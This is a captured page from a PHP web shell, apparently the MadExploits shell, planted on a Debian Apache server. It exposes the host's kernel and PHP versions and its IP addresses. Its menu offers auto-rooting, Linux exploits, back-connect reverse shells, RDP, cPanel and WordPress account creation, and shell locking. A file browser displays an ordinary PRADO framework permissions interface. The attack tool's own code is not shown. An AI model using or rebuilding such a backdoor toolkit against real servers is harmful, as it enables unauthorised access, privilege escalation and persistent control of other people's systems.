Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.43.92
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Security /
Permissions /
[ HOME SHELL ]
Name
Size
Permission
Action
IPermissions.php
1.2
KB
-rw-r--r--
TPermissionEvent.php
3.9
KB
-rw-r--r--
TPermissionsAction.php
12.11
KB
-rw-r--r--
TPermissionsBehavior.php
5.51
KB
-rw-r--r--
TPermissionsConfigurationBehav...
3.73
KB
-rw-r--r--
TPermissionsManager.php
34.08
KB
-rw-r--r--
TUserOwnerRule.php
1.18
KB
-rw-r--r--
TUserPermissionsBehavior.php
2.91
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IPermissions.php
<?php /** * IPermissions interface file * * @author Brad Anderson <belisoful@icloud.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Security\Permissions; /** * IPermissions interface * * IPermissions specifies the interface for implementation by any class * that wants permission authorization built in through dynamic events. * This interface will have the {@link TPermissionsBehavior} attached by * {@link TPermissionsManager}. When attached, the behavior will register * the owners permissions, and check a permission rules on specified dynamic * events. * * {@link getPermissions} returns an array of {@link TPermissionEvent}. These * are automatically registered permissions. If nothing is returned, then * the implementation will need to register its own permissions through * $manager->{@link TPermissionsManager::registerPermissions}. * * @author Brad Anderson <belisoful@icloud.com> * @since 4.2.0 */ interface IPermissions { /** * @param \Prado\Security\Permissions\TPermissionsManager $manager * @return \Prado\Security\Permissions\TPermissionEvent[] */ public function getPermissions($manager); }
Close